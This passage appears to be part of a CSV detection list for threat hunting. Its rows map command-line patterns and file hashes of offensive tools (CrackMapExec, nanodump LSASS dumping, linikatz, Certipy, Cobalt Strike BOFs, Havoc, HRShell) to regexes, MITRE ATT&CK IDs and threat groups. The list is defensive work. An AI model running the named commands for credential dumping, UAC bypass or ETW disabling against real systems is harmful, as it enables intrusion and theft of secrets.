"cbeecb2981c75b8f066b1f04f19f2095bdcf22f19d0d3f1099b83963547c00cb","cbeecb2981c75b8f066b1f04f19f2095bdcf22f19d0d3f1099b83963547c00cb","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "cd PayGen","cd\sPayGen","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "certipy *","certipy\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate 
Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "cme smb *","cme\ssmb\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "cme smb -*","cme\ssmb\s\-.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "cme winrm *","cme\swinrm\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "dcenum *","dcenum\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "delete_file *.dll","delete_file\s.{0,1000}\.dll","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "detect-hooks","detect\-hooks","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "doc.1a.*\.*","doc\.1a\..{0,1000}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc.4a.*\.*","doc\.4a\..{0,1000}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda 
- CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc.bc.*\.*","doc\.bc\..{0,1000}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc.md.*\.*","doc\.md\..{0,1000}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc.po.*\.*","doc\.po\..{0,1000}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda 
- CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc.tx.*\.*","doc\.tx\..{0,1000}\\\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc-stg-prepend*.*","doc\-stg\-prepend.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "doc-stg-sh*.*","doc\-stg\-sh.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider 
- Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","dns query field","10","10","N/A","N/A","N/A","N/A" "dumpwifi *","dumpwifi\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "e69a6f8e45f8dd8ee977b6aed73cac25537c39f6fb74cf9cc225f2af1d9e4cd7","e69a6f8e45f8dd8ee977b6aed73cac25537c39f6fb74cf9cc225f2af1d9e4cd7","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "etw stop","etw\sstop","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "EVUAC *","EVUAC\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","0","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "exploit -j -z","exploit\s\-j\s\-z","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "f1696fdc28bdb9e757a14b2ba9e698af8f70bb928d3c9e9fb524249f20231d08","f1696fdc28bdb9e757a14b2ba9e698af8f70bb928d3c9e9fb524249f20231d08","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "f3aacbbaacceb0bdcac49d9b5e1da52d6883b7d736ca68f0a98f5a1d4838b995","f3aacbbaacceb0bdcac49d9b5e1da52d6883b7d736ca68f0a98f5a1d4838b995","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "fw_walk display*","fw_walk\sdisplay.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "fw_walk status*","fw_walk\sstatus.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "fw_walk total*","fw_walk\stotal.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "get-delegation *","get\-delegation\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "get-delegation *","get\-delegation\s.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
